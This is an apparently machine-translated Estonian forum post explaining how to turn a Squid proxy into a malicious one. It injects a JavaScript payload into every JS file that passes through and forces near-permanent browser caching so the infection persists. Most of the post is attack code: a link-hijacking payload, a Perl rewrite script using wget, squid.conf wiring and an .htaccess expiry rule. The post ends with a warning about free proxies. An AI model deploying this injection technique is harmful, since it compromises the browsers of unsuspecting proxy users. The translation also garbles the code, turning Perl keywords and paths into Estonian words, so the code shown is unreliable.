Seda postitust toimetas viimati Mo Xiaowen 2015-6-7 23:19
Seda saab teha lihtsalt SQUIDi konfiguratsiooni muutmisega
Mis on SQUID?
Squid on tarkvara, mis vahemällu salvestab internetiandmeid, võtab kasutajatelt allalaadimispäringuid vastu ja töötleb allalaaditud andmeid automaatselt. Kui kasutaja soovib avalehte alla laadida, saab ta saata Squidile päringu, paluda Squidil see tema eest alla laadida, seejärel ühendub Squid veebilehega ja taotleb avalehte, ning saadab avalehe kasutajale, hoides varukoopiat; kui teised kasutajad taotlevad sama lehte, saadab Squid salvestatud varukoopia kohe kasutajale, nii et kasutaja tunneb, et kiirus on üsna kiire. Squid suudab proxy protokolle nagu HTTP, FTP, GOPHER, SSL ja WAIS ning Squid suudab seda automaatselt hallata ning saad seadistada Squidi vastavalt oma vajadustele, et filtreerida soovimatuid asju.
Squid töötab paljudes operatsioonisüsteemides, nagu AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 jne.
Rakendus on väga lihtne:
1. Paigalda Squid ühele Linuxi serverile.
2. Muuda serveri koodi, sisesta osa meie koodist kõigisse edastatud javascrip-failidesse ja saada see välja.
3. Sea meie muudetud js-faili vahemälu aeg võimalikult kõrgeks.
See meetod kehtib ka veebilehtede puhul, kus SSL on lubatud; kui veebileht laadib ebaturvalise ressursi (näiteks jquery HTTP-lehe puhul), annavad enamik brausereid hoiatuse, kuid vähesed pööravad sellele tähelepanu.
Chema ütles, et üle 5000 inimese kasutas tema proxyt paar päeva pärast selle vabastamist ja enamik inimesi kasutas seda halbade asjade tegemiseks, sest nad kasutasid proxyt, nii et nad arvasid, et see on anonüümne ja turvaline, kuid nad ei oodanud, et proxy-server teeb ka halbu asju.
Tee oma pahatahtlik proxy server
Kui sul on juba Squid proxy server, vajad ka veebiserverit nagu Apache.
1. samm: Loo kasulik koormus
Kasutan lihtsat skripti demonstratsioonina, et suunata kõik lingid oma veebisaidile.
/etc/squid/payload.js
[mw_shl_code=javascrip eemalda t, tõene]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
2. samm: Kirjuta skript, mis nakatab kõik JS-failid
/etc/squid/poison.pl
[mw_shl_code=perl,true]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
kui(<>)
{
hammusta $_;
if($_ =- /(.*.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
süsteem("kass /jne/kalmaar/payload.js >> /var/www/tmp/$pid-$count.js");
trükk "http://127.0.0.1:80/tmp/$pid-$count.js";
}
else
{
trükk "$_";
}
$count++;
}[/mw_shl_code]
See skript kasutab wget'i, et saada lehe algne javascrip ja eemaldada t-fail, seejärel lisada kood /etc/squid/payload.js ja saata muudetud fail kliendile, samal ajal kui pead looma /var/www/tmp kataloogi ja lubama kalmaaril sinna faile kirjutada. See kataloog salvestab muudetud js-failid.
3. samm: Ühenda ülaltoodud stsenaarium Squidiga
Lisa see /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/kalmaar/poison.pl[/mw_shl_code]
4. samm: Pane vahemälu kunagi üles ütlema.
/var/www/tmp/.htaccess
[mw_shl_code=html,tõene] Aegubaktiivne sisse
AegubVaikimisi "ligipääs pluss 3000 päeva"[/mw_shl_code]
See ütleb Apache'ile, et ta peab andma talle pika aegumisaja, kuni kasutaja oma vahemälu puhastab.
Kui ühendad selle proksi, suunab ükskõik millisel lingil klõpsamine sind minu veebilehele ja vahemälu jääb alles, isegi kui sa hiljem proxyt ei kasuta. Kasutasin just mitteagressiivset koormust ja selle meetodiga saavad häkkerid palju rohkem teha. Seega tuleta endale ja sõpradele meelde, et ole ettevaatlik tasuta prokside kasutamisel.
|
Postitatud 19.01.2015 02:34:56
|
|
|
|
Postitatud 19.01.2015 08:48:45
|
Üürileandja|
Postitatud 20.01.2015 14:36:06
|
